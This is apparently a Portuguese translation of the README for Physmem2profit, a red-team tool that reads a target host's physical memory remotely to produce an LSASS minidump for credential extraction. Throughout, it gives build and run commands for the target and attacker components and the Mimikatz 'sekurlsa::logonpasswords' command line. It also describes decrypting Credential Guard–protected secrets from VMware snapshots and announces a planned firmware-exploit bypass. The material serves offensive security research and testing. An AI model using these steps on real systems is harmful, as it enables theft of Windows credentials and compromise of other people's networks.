
Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely
O Physmem2profit pode ser usado para criar um minidump do processo LSASS de um host alvo ao analisar memória física remotamente. A intenção desta pesquisa é propor uma abordagem alternativa para roubo de credenciais e criar uma estrutura modular que possa ser estendida para suportar outros drivers que possam acessar a memória física. O Physmem2profit gera um minidump (.dmp) do LSASS que pode ser analisado posteriormente com o Mimikatz. A ferramenta não requer o Cobalt Strike, mas deve funcionar bem sobre o beacon com um proxy SOCKS.
A ideia é ilustrada abaixo:

A ferramenta tem dois componentes:
physmem2profit.exe, executado no host alvo
physmem2profit, executado na máquina atacante
--mode mount, conecta-se à máquina alvo e monta a RAM física do alvo como um arquivo bruto com a ajuda do FUSE--mode dump, chama vários plugins do Rekall para analisar a imagem de memória e gerar um minidump do processo LSASS.--mode all, realiza ambas as ações acima. A conexão com o servidor será encerrada quando o dump for concluído.git clone --recurse-submodules https://github.com/FSecureLABS/physmem2profit.gitphysmem2profit/server/Physmem2profit.sln com o Visual Studiobash physmem2profit/client/install.shphysmem2profit.exe [--ip IP] [-p PORT] [--hidden] [--verbose] no alvo como administrador.
source physmem2profit/client/.env/bin/activate na máquina atacante. Este comando ativará o virtualenv criado pelo install.sh.cd physmem2profit/client e python3 physmem2profit --host HOST [--port PORT] [--mode MODE] [--driver DRIVER ] [--instal DRIVER_PATH_ON_TARGET] [--label LABEL_FOR_MEMORY_DUMP] na máquina atacante
physmem2profit.exe precisa estar em execução na máquina alvo antes de você executar este comando.output/[label]-[date]-lsass.dmp na máquina atacante.mimikatz.exe "sekurlsa::minidump [label]-[date]-lsass.dmp" "sekurlsa::logonpasswords" "exit"Descriptografar credenciais protegidas pelo Credential Guard requer obter acesso à chave de criptografia armazenada no Secure World. Para fins de teste, o Physmem2profit suporta a recuperação de dados do Secure World a partir de snapshots do VMware Fusion/Workstation (arquivos .vmem). Isso permite que credenciais protegidas pelo Credential Guard sejam descriptografadas com a ajuda do Mimikatz.
msinfo32 para garantir que Virtualization-based security Services Running diga Credential Guardpython3 physmem2profit --mode dump --vmem /tmp/Win10-Snapshot1.vmem --label credential-guard-test
output/[label]-[date]-lsass.dmp. O minidump contém um stream especial que armazena os dados do Secure World, permitindo que o Mimikatz localize a chave de criptografia.output/[label]-[date]-secure-world.raw.mimikatz.exe "sekurlsa::minidump [label]-[date]-lsass.dmp" "sekurlsa::logonpasswords" "exit"O suporte para contornar o Credential Guard explorando a vulnerabilidade de firmware do S3 Resume, demonstrada em nossa palestra no Disobey, está chegando em breve :).
Repensando o Roubo de Credenciais | um post de blog explicando por que esta abordagem para roubo de credenciais foi escolhida.
O Physmem2profit é desenvolvido por @b3arr0 e @TimoHirvonen.
Agradecimentos pelas contribuições: